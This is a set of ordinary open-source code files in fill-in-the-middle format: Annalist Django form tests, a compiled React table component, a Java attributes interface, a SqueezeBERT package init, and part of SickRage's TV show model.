self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record type exists self._check_recordview_values("newview", update="NewView", num_fields=0) return def test_post_new_view_cancel(self): self.assertFalse(RecordView.exists(self.testcoll, "newview")) f = view_view_form_data( view_id="newview", action="new", cancel="Cancel", update="Updated RecordView" ) u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record type still does not exist self.assertFalse(RecordView.exists(self.testcoll, "newview")) return def test_post_new_view_missing_id(self): f = view_view_form_data( view_id="", action="new", update="RecordView" ) u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") # log.info("u %s, f %r"%(u,f)) r = self.client.post(u, f) # print r.content self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="new", view_id="", orig_view_id="orig_view_id", view_label=None, view_entity_type="annal:View", ) return def test_post_new_view_invalid_id(self): f = view_view_form_data( view_id="!badview", orig_id="orig_view_id", action="new", update="RecordView" ) u = entitydata_edit_url("new", "testcoll", layout.VIEW_TYPEID, view_id="View_view") # log.info("u %s, f %r"%(u,f)) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Check context self._check_default_view_context_fields(r, action="new", view_id="!badview", orig_view_id="orig_view_id", view_label=None, view_entity_type="annal:View", ) return # -------- copy view -------- def test_post_copy_view(self): self.assertFalse(RecordView.exists(self.testcoll, "copyview")) f = view_view_form_data( view_id="copyview", orig_id="Default_view", orig_coll="_annalist_site", action="copy", update="RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record type exists self._check_recordview_values("copyview", update="RecordView") return def test_post_copy_view_cancel(self): self.assertFalse(RecordView.exists(self.testcoll, "copyview")) f = view_view_form_data( view_id="copyview", orig_id="Default_view", action="copy", cancel="Cancel", update="RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that target record view still does not exist self.assertFalse(RecordView.exists(self.testcoll, "copyview")) return def test_post_copy_view_missing_id(self): f = view_view_form_data( view_id="", orig_id="Default_view", action="copy", update="Updated RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="copy", view_id="", orig_view_id="Default_view", view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) return def test_post_copy_view_invalid_id(self): f = view_view_form_data( view_id="!badview", orig_id="Default_view", action="copy", update="Updated RecordView" ) u = entitydata_edit_url( "copy", "testcoll", layout.VIEW_TYPEID, entity_id="Default_view", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="copy", view_id="!badview", orig_view_id="Default_view",<|fim▁hole|> view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) return # -------- edit view -------- def test_post_edit_view(self): self._create_record_view("editview") self._check_recordview_values("editview") f = view_view_form_data( view_id="editview", orig_id="editview", action="edit", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record view exists self._check_recordview_values("editview", update="Updated RecordView") return def test_post_edit_view_new_id(self): self._create_record_view("editview1") self._check_recordview_values("editview1") f = view_view_form_data( view_id="editview2", orig_id="editview1", action="edit", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview1", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record view exists and old does not self.assertFalse(RecordView.exists(self.testcoll, "editview1")) self._check_recordview_values("editview2", update="Updated RecordView") return def test_post_edit_view_cancel(self): self._create_record_view("editview") self._check_recordview_values("editview") f = view_view_form_data( view_id="editview", orig_id="editview", action="edit", cancel="Cancel", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that target record view still does not exist and unchanged self._check_recordview_values("editview") return def test_post_edit_view_missing_id(self): self._create_record_view("editview") self._check_recordview_values("editview") # Form post with ID missing f = view_view_form_data( view_id="", orig_id="editview", action="edit", view_entity_type="annal:View", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="edit", view_id="", orig_view_id="editview", view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) # Check original data is unchanged self._check_recordview_values("editview") return def test_post_edit_view_invalid_id(self): self._create_record_view("editview") self._check_recordview_values("editview") # Form post with invalid ID f = view_view_form_data( view_id="!badview", orig_id="editview", action="edit", update="Updated RecordView" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.RECORD_VIEW_ID,)) # Test context self._check_default_view_context_fields(r, action="edit", view_id="!badview", orig_view_id="editview", view_label=None, view_entity_type="annal:View", update="Updated RecordView" ) # Check original data is unchanged self._check_recordview_values("editview") return def test_post_edit_view_field_placement_missing(self): self._create_record_view("editview") self._check_recordview_values("editview") f = view_view_form_data( view_id="editview", orig_id="editview", action="edit", update="Updated RecordView", field3_placement="" ) u = entitydata_edit_url( "edit", "testcoll", layout.VIEW_TYPEID, entity_id="editview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") self.assertEqual(r['location'], self.continuation_url) # Check that new record view exists self._check_recordview_values("editview", update="Updated RecordView", field3_placement="") return # ----------------------------------------------------------------------------- # Form response tests for view descriptions with repeating fields # ----------------------------------------------------------------------------- def test_post_add_field(self): self._create_record_view("addfieldview") self._check_recordview_values("addfieldview") f = view_view_form_data( view_id="addfieldview", orig_id="addfieldview", action="edit", view_entity_type="annal:View", add_field=True ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="addfieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context self._check_default_view_context_fields(r, action="edit", add_field=True, view_id="addfieldview", orig_view_id="addfieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_remove_field(self): self._create_record_view("removefieldview") self._check_recordview_values("removefieldview") f = view_view_form_data( view_id="removefieldview", orig_id="removefieldview", action="edit", remove_fields=['3'] ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="removefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context self._check_default_view_context_fields(r, action="edit", remove_field=True, view_id="removefieldview", orig_view_id="removefieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_remove_no_field_selected(self): self._create_record_view("removefieldview") self._check_recordview_values("removefieldview") f = view_view_form_data( view_id="removefieldview", orig_id="removefieldview", action="edit", remove_fields="no-selection" ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="removefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") self.assertContains(r, "<h3>%s</h3>"%(message.REMOVE_FIELD_ERROR,)) self.assertContains(r, """<p class="messages">%s</p>"""%(message.NO_FIELD_SELECTED,)) # Test context self._check_default_view_context_fields(r, action="edit", view_id="removefieldview", orig_view_id="removefieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_move_up_fields(self): self._create_record_view("movefieldview") self._check_recordview_values("movefieldview") f = view_view_form_data( view_id="movefieldview", orig_id="movefieldview", action="edit", view_entity_type="annal:View", move_up_fields=["2","3"] ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="movefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") # Test context self._check_default_view_context_fields(r, action="edit", move_up=[2,3], view_id="movefieldview", orig_view_id="movefieldview", view_label=None, view_entity_type="annal:View", ) return def test_post_move_down_fields(self): self._create_record_view("movefieldview") self._check_recordview_values("movefieldview") f = view_view_form_data( view_id="movefieldview", orig_id="movefieldview", action="edit", view_entity_type="annal:View", move_down_fields=["1"] ) u = entitydata_edit_url( action="edit", coll_id="testcoll", type_id=layout.VIEW_TYPEID, entity_id="movefieldview", view_id="View_view" ) r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = u + "?continuation_url=" + self.continuation_path self.assertEqual(v, r['location']) # Retrieve from redirect location, and test result r = self.client.get(v) self.assertEqual(r.status_code, 200) self.assertEqual(r.reason_phrase, "OK") return # ----------------------------------------------------------------------------- # # ConfirmRecordViewDeleteTests tests for completion of record deletion # # ----------------------------------------------------------------------------- class ConfirmRecordViewDeleteTests(AnnalistTestCase): """ Tests for record type deletion on response to confirmation form """ def setUp(self): init_annalist_test_site() self.testsite = Site(TestBaseUri, TestBaseDir) self.testcoll = Collection.create(self.testsite, "testcoll", collection_create_values("testcoll")) # Login and permissions create_test_user(self.testcoll, "testuser", "testpassword") self.client = Client(HTTP_HOST=TestHost) loggedin = self.client.login(username="testuser", password="testpassword") self.assertTrue(loggedin) return def tearDown(self): return def test_CollectionActionViewTest(self): self.assertEqual(RecordViewDeleteConfirmedView.__name__, "RecordViewDeleteConfirmedView", "Check RecordViewDeleteConfirmedView class name") return # NOTE: test_collection checks the appropriate response from clicking the delete button, # so here only need to test completion code. def test_post_confirmed_remove_view(self): t = RecordView.create(self.testcoll, "deleteview", recordview_create_values("deleteview")) self.assertTrue(RecordView.exists(self.testcoll, "deleteview")) # Submit positive confirmation u = TestHostUri + recordview_edit_url("delete", "testcoll") f = recordview_delete_confirm_form_data("deleteview") r = self.client.post(u, f) self.assertEqual(r.status_code, 302) self.assertEqual(r.reason_phrase, "Found") self.assertEqual(r.content, b"") v = collection_edit_url("testcoll") e1 = "info_head=" e2 = "info_message=" e3 = "deleteview" e4 = "testcoll" self.assertIn(v, r['location']) self.assertIn(e1, r['location']) self.assertIn(e2, r['location']) self.assertIn(e3, r['location']) # Confirm deletion self.assertFalse(RecordView.exists(self.testcoll, "deleteview")) return # End. #........1.........2.........3.........4.........5.........6.........7.........8<|fim▁end|>
<|file_name|>tableBody.js<|end_file_name|><|fim▁begin|>'use strict'; Object.defineProperty(exports, "__esModule", { value: true }); exports.default = undefined; var _style = require('antd/lib/icon/style'); var _icon = require('antd/lib/icon'); var _icon2 = _interopRequireDefault(_icon); var _extends2 = require('babel-runtime/helpers/extends'); var _extends3 = _interopRequireDefault(_extends2); var _getPrototypeOf = require('babel-runtime/core-js/object/get-prototype-of'); var _getPrototypeOf2 = _interopRequireDefault(_getPrototypeOf); var _classCallCheck2 = require('babel-runtime/helpers/classCallCheck'); var _classCallCheck3 = _interopRequireDefault(_classCallCheck2); var _createClass2 = require('babel-runtime/helpers/createClass'); var _createClass3 = _interopRequireDefault(_createClass2); var _possibleConstructorReturn2 = require('babel-runtime/helpers/possibleConstructorReturn'); var _possibleConstructorReturn3 = _interopRequireDefault(_possibleConstructorReturn2); var _inherits2 = require('babel-runtime/helpers/inherits'); var _inherits3 = _interopRequireDefault(_inherits2); var _class, _temp; var _react = require('react'); var _react2 = _interopRequireDefault(_react); var _tableRow = require('./tableRow'); var _tableRow2 = _interopRequireDefault(_tableRow); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } var TBody = (_temp = _class = function (_React$Component) { (0, _inherits3.default)(TBody, _React$Component); function TBody(props) { (0, _classCallCheck3.default)(this, TBody); var _this = (0, _possibleConstructorReturn3.default)(this, (TBody.__proto__ || (0, _getPrototypeOf2.default)(TBody)).call(this, props)); _this.state = {}; return _this;<|fim▁hole|> key: 'render', value: function render() { var _this2 = this; var _props = this.props; var dataSource = _props.dataSource; var _props$locale = _props.locale; var locale = _props$locale === undefined ? {} : _props$locale; return _react2.default.createElement( 'div', { className: 'nd-body' }, dataSource.length ? _react2.default.createElement( 'div', null, dataSource.map(function (item, dataIndex) { return _react2.default.createElement(_tableRow2.default, (0, _extends3.default)({ key: dataIndex, data: item }, _this2.props)); }) ) : _react2.default.createElement( 'div', null, _react2.default.createElement(_icon2.default, { type: 'frown' }), ' ', locale.no_data || 'No Data' ) ); } }]); return TBody; }(_react2.default.Component), _class.propTypes = { dataSource: _react.PropTypes.array.isRequired, locale: _react.PropTypes.object }, _temp); exports.default = TBody; module.exports = exports['default'];<|fim▁end|>
} (0, _createClass3.default)(TBody, [{
<|file_name|>DynamicAttributes.java<|end_file_name|><|fim▁begin|>/** * Copyright 2014 Jordan Zimmerman * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package io.soabase.core.features.attributes; import io.soabase.core.listening.Listenable; import java.util.Collection; /** * Gives access to dynamic attributes. The various get methods return * the current value for the given key after applying overrides and scopes, etc. * Always call the methods to get the current value as it may change during runtime. */<|fim▁hole|> public String getAttribute(String key, String defaultValue); public boolean getAttributeBoolean(String key); public boolean getAttributeBoolean(String key, boolean defaultValue); public int getAttributeInt(String key); public int getAttributeInt(String key, int defaultValue); public long getAttributeLong(String key); public long getAttributeLong(String key, long defaultValue); public double getAttributeDouble(String key); public double getAttributeDouble(String key, double defaultValue); public void temporaryOverride(String key, boolean value); public void temporaryOverride(String key, int value); public void temporaryOverride(String key, long value); public void temporaryOverride(String key, double value); public void temporaryOverride(String key, String value); public boolean removeOverride(String key); public Collection<String> getKeys(); public Listenable<DynamicAttributeListener> getListenable(); }<|fim▁end|>
public interface DynamicAttributes { public String getAttribute(String key);
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># flake8: noqa # There's no way to ignore "F401 '...' imported but unused" warnings in this # module, but to preserve other warnings. So, don't check this module at all. # Copyright 2020 The HuggingFace Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import TYPE_CHECKING from ...file_utils import _LazyModule, is_tokenizers_available, is_torch_available _import_structure = { "configuration_squeezebert": ["SQUEEZEBERT_PRETRAINED_CONFIG_ARCHIVE_MAP", "SqueezeBertConfig"], "tokenization_squeezebert": ["SqueezeBertTokenizer"], } if is_tokenizers_available(): _import_structure["tokenization_squeezebert_fast"] = ["SqueezeBertTokenizerFast"] if is_torch_available(): _import_structure["modeling_squeezebert"] = [ "SQUEEZEBERT_PRETRAINED_MODEL_ARCHIVE_LIST", "SqueezeBertForMaskedLM", "SqueezeBertForMultipleChoice", "SqueezeBertForQuestionAnswering", "SqueezeBertForSequenceClassification", "SqueezeBertForTokenClassification", "SqueezeBertModel", "SqueezeBertModule", "SqueezeBertPreTrainedModel", ] <|fim▁hole|>if TYPE_CHECKING: from .configuration_squeezebert import SQUEEZEBERT_PRETRAINED_CONFIG_ARCHIVE_MAP, SqueezeBertConfig from .tokenization_squeezebert import SqueezeBertTokenizer if is_tokenizers_available(): from .tokenization_squeezebert_fast import SqueezeBertTokenizerFast if is_torch_available(): from .modeling_squeezebert import ( SQUEEZEBERT_PRETRAINED_MODEL_ARCHIVE_LIST, SqueezeBertForMaskedLM, SqueezeBertForMultipleChoice, SqueezeBertForQuestionAnswering, SqueezeBertForSequenceClassification, SqueezeBertForTokenClassification, SqueezeBertModel, SqueezeBertModule, SqueezeBertPreTrainedModel, ) else: import sys sys.modules[__name__] = _LazyModule(__name__, globals()["__file__"], _import_structure, module_spec=__spec__)<|fim▁end|>
<|file_name|>tv.py<|end_file_name|><|fim▁begin|># Author: Nic Wolfe <[email protected]> # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. from __future__ import with_statement import os.path import datetime import threading import re import glob import stat import traceback import sickbeard import xml.etree.cElementTree as etree from name_parser.parser import NameParser, InvalidNameException, InvalidShowException import subliminal try: from send2trash import send2trash except ImportError: pass from imdb import imdb from sickbeard import db from sickbeard import helpers, exceptions, logger from sickbeard.exceptions import ex from sickbeard import image_cache from sickbeard import notifiers from sickbeard import postProcessor from sickbeard import subtitles from sickbeard import history from sickbeard.blackandwhitelist import BlackAndWhiteList from sickbeard import sbdatetime from sickbeard import network_timezones from sickbeard.indexers.indexer_config import INDEXER_TVRAGE from dateutil.tz import * from sickbeard import encodingKludge as ek from common import Quality, Overview, statusStrings from common import DOWNLOADED, SNATCHED, SNATCHED_PROPER, SNATCHED_BEST, ARCHIVED, IGNORED, UNAIRED, WANTED, SKIPPED, \ UNKNOWN, FAILED from common import NAMING_DUPLICATE, NAMING_EXTEND, NAMING_LIMITED_EXTEND, NAMING_SEPARATED_REPEAT, \ NAMING_LIMITED_EXTEND_E_PREFIXED import shutil import shutil_custom shutil.copyfile = shutil_custom.copyfile_custom def dirty_setter(attr_name): def wrapper(self, val): if getattr(self, attr_name) != val: setattr(self, attr_name, val) self.dirty = True return wrapper class TVShow(object): def __init__(self, indexer, indexerid, lang=""): self._indexerid = int(indexerid) self._indexer = int(indexer) self._name = "" self._imdbid = "" self._network = "" self._genre = "" self._classification = "" self._runtime = 0 self._imdb_info = {} self._quality = int(sickbeard.QUALITY_DEFAULT) self._flatten_folders = int(sickbeard.FLATTEN_FOLDERS_DEFAULT) self._status = "Unknown" self._airs = "" self._startyear = 0 self._paused = 0 self._air_by_date = 0 self._subtitles = int(sickbeard.SUBTITLES_DEFAULT) self._dvdorder = 0 self._archive_firstmatch = 0 self._lang = lang self._last_update_indexer = 1 self._sports = 0 self._anime = 0 self._scene = 0 self._rls_ignore_words = "" self._rls_require_words = "" self._default_ep_status = SKIPPED self.dirty = True self._location = "" self.lock = threading.Lock() self.isDirGood = False self.episodes = {} self.nextaired = "" self.release_groups = None otherShow = helpers.findCertainShow(sickbeard.showList, self.indexerid) if otherShow != None: raise exceptions.MultipleShowObjectsException("Can't create a show if it already exists") self.loadFromDB() name = property(lambda self: self._name, dirty_setter("_name")) indexerid = property(lambda self: self._indexerid, dirty_setter("_indexerid")) indexer = property(lambda self: self._indexer, dirty_setter("_indexer")) # location = property(lambda self: self._location, dirty_setter("_location")) imdbid = property(lambda self: self._imdbid, dirty_setter("_imdbid")) network = property(lambda self: self._network, dirty_setter("_network")) genre = property(lambda self: self._genre, dirty_setter("_genre")) classification = property(lambda self: self._classification, dirty_setter("_classification")) runtime = property(lambda self: self._runtime, dirty_setter("_runtime")) imdb_info = property(lambda self: self._imdb_info, dirty_setter("_imdb_info")) quality = property(lambda self: self._quality, dirty_setter("_quality")) flatten_folders = property(lambda self: self._flatten_folders, dirty_setter("_flatten_folders")) status = property(lambda self: self._status, dirty_setter("_status")) airs = property(lambda self: self._airs, dirty_setter("_airs")) startyear = property(lambda self: self._startyear, dirty_setter("_startyear")) paused = property(lambda self: self._paused, dirty_setter("_paused")) air_by_date = property(lambda self: self._air_by_date, dirty_setter("_air_by_date")) subtitles = property(lambda self: self._subtitles, dirty_setter("_subtitles")) dvdorder = property(lambda self: self._dvdorder, dirty_setter("_dvdorder")) archive_firstmatch = property(lambda self: self._archive_firstmatch, dirty_setter("_archive_firstmatch")) lang = property(lambda self: self._lang, dirty_setter("_lang")) last_update_indexer = property(lambda self: self._last_update_indexer, dirty_setter("_last_update_indexer")) sports = property(lambda self: self._sports, dirty_setter("_sports")) anime = property(lambda self: self._anime, dirty_setter("_anime")) scene = property(lambda self: self._scene, dirty_setter("_scene")) rls_ignore_words = property(lambda self: self._rls_ignore_words, dirty_setter("_rls_ignore_words")) rls_require_words = property(lambda self: self._rls_require_words, dirty_setter("_rls_require_words")) default_ep_status = property(lambda self: self._default_ep_status, dirty_setter("_default_ep_status")) @property def is_anime(self): if int(self.anime) > 0: return True else: return False @property def is_sports(self): if int(self.sports) > 0: return True else: return False @property def is_scene(self): if int(self.scene) > 0: return True else: return False @property def network_logo_name(self): return self.network.replace(u'\u00C9', 'e').replace(u'\u00E9', 'e').lower() def _getLocation(self): # no dir check needed if missing show dirs are created during post-processing if sickbeard.CREATE_MISSING_SHOW_DIRS: return self._location if ek.ek(os.path.isdir, self._location): return self._location else: raise exceptions.ShowDirNotFoundException("Show folder doesn't exist, you shouldn't be using it") def _setLocation(self, newLocation): logger.log(u"Setter sets location to " + newLocation, logger.DEBUG) # Don't validate dir if user wants to add shows without creating a dir if sickbeard.ADD_SHOWS_WO_DIR or ek.ek(os.path.isdir, newLocation): dirty_setter("_location")(self, newLocation) self._isDirGood = True else: raise exceptions.NoNFOException("Invalid folder for the show!") location = property(_getLocation, _setLocation) # delete references to anything that's not in the internal lists def flushEpisodes(self): for curSeason in self.episodes: for curEp in self.episodes[curSeason]: myEp = self.episodes[curSeason][curEp] self.episodes[curSeason][curEp] = None del myEp def getAllEpisodes(self, season=None, has_location=False): sql_selection = "SELECT season, episode, " # subselection to detect multi-episodes early, share_location > 0 sql_selection = sql_selection + " (SELECT COUNT (*) FROM tv_episodes WHERE showid = tve.showid AND season = tve.season AND location != '' AND location = tve.location AND episode != tve.episode) AS share_location " sql_selection = sql_selection + " FROM tv_episodes tve WHERE showid = " + str(self.indexerid) if season is not None: sql_selection = sql_selection + " AND season = " + str(season) if has_location: sql_selection = sql_selection + " AND location != '' " # need ORDER episode ASC to rename multi-episodes in order S01E01-02 sql_selection = sql_selection + " ORDER BY season ASC, episode ASC" myDB = db.DBConnection() results = myDB.select(sql_selection) ep_list = [] for cur_result in results: cur_ep = self.getEpisode(int(cur_result["season"]), int(cur_result["episode"])) if not cur_ep: continue cur_ep.relatedEps = [] if cur_ep.location: # if there is a location, check if it's a multi-episode (share_location > 0) and put them in relatedEps if cur_result["share_location"] > 0: related_eps_result = myDB.select( "SELECT * FROM tv_episodes WHERE showid = ? AND season = ? AND location = ? AND episode != ? ORDER BY episode ASC", [self.indexerid, cur_ep.season, cur_ep.location, cur_ep.episode]) for cur_related_ep in related_eps_result: related_ep = self.getEpisode(int(cur_related_ep["season"]), int(cur_related_ep["episode"])) if related_ep and related_ep not in cur_ep.relatedEps: cur_ep.relatedEps.append(related_ep) ep_list.append(cur_ep) return ep_list def getEpisode(self, season=None, episode=None, file=None, noCreate=False, absolute_number=None, forceUpdate=False): # if we get an anime get the real season and episode if self.is_anime and absolute_number and not season and not episode: myDB = db.DBConnection() sql = "SELECT * FROM tv_episodes WHERE showid = ? AND absolute_number = ? AND season != 0" sqlResults = myDB.select(sql, [self.indexerid, absolute_number]) if len(sqlResults) == 1: episode = int(sqlResults[0]["episode"]) season = int(sqlResults[0]["season"]) logger.log( "Found episode by absolute_number %s which is S%02dE%02d" % (absolute_number, season, episode), logger.DEBUG) elif len(sqlResults) > 1: logger.log("Multiple entries for absolute number: " + str( absolute_number) + " in show: " + self.name + " found ", logger.ERROR) return None else: logger.log( "No entries for absolute number: " + str(absolute_number) + " in show: " + self.name + " found.", logger.DEBUG) return None if not season in self.episodes: self.episodes[season] = {} if not episode in self.episodes[season] or self.episodes[season][episode] is None: if noCreate: return None logger.log(str(self.indexerid) + u": An object for episode S%02dE%02d didn't exist in the cache, trying to create it" % (season, episode), logger.DEBUG) if file: ep = TVEpisode(self, season, episode, file) else: ep = TVEpisode(self, season, episode) if ep != None: self.episodes[season][episode] = ep return self.episodes[season][episode] def should_update(self, update_date=datetime.date.today()): # if show is not 'Ended' always update (status 'Continuing') if self.status == 'Continuing': return True # run logic against the current show latest aired and next unaired data to see if we should bypass 'Ended' status graceperiod = datetime.timedelta(days=30) last_airdate = datetime.date.fromordinal(1) # get latest aired episode to compare against today - graceperiod and today + graceperiod myDB = db.DBConnection() sql_result = myDB.select( "SELECT * FROM tv_episodes WHERE showid = ? AND season > '0' AND airdate > '1' AND status > '1' ORDER BY airdate DESC LIMIT 1", [self.indexerid]) if sql_result: last_airdate = datetime.date.fromordinal(sql_result[0]['airdate']) if last_airdate >= (update_date - graceperiod) and last_airdate <= (update_date + graceperiod): return True # get next upcoming UNAIRED episode to compare against today + graceperiod sql_result = myDB.select( "SELECT * FROM tv_episodes WHERE showid = ? AND season > '0' AND airdate > '1' AND status = '1' ORDER BY airdate ASC LIMIT 1", [self.indexerid]) if sql_result: next_airdate = datetime.date.fromordinal(sql_result[0]['airdate']) if next_airdate <= (update_date + graceperiod): return True last_update_indexer = datetime.date.fromordinal(self.last_update_indexer) # in the first year after ended (last airdate), update every 30 days if (update_date - last_airdate) < datetime.timedelta(days=450) and ( update_date - last_update_indexer) > datetime.timedelta(days=30): return True return False def writeShowNFO(self): result = False if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return False logger.log(str(self.indexerid) + u": Writing NFOs for show", logger.DEBUG) for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.create_show_metadata(self) or result return result def writeMetadata(self, show_only=False): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return self.getImages() self.writeShowNFO() if not show_only: self.writeEpisodeNFOs() def writeEpisodeNFOs(self): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return logger.log(str(self.indexerid) + u": Writing NFOs for all episodes", logger.DEBUG) myDB = db.DBConnection() sqlResults = myDB.select("SELECT * FROM tv_episodes WHERE showid = ? AND location != ''", [self.indexerid]) for epResult in sqlResults: logger.log(str(self.indexerid) + u": Retrieving/creating episode S%02dE%02d" % (epResult["season"], epResult["episode"]), logger.DEBUG) curEp = self.getEpisode(epResult["season"], epResult["episode"]) if not curEp: continue curEp.createMetaFiles() def updateMetadata(self): if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return self.updateShowNFO() def updateShowNFO(self): result = False if not ek.ek(os.path.isdir, self._location): logger.log(str(self.indexerid) + u": Show dir doesn't exist, skipping NFO generation") return False logger.log(str(self.indexerid) + u": Updating NFOs for show with new indexer info") for cur_provider in sickbeard.metadata_provider_dict.values(): result = cur_provider.update_show_indexer_metadata(self) or result return result # 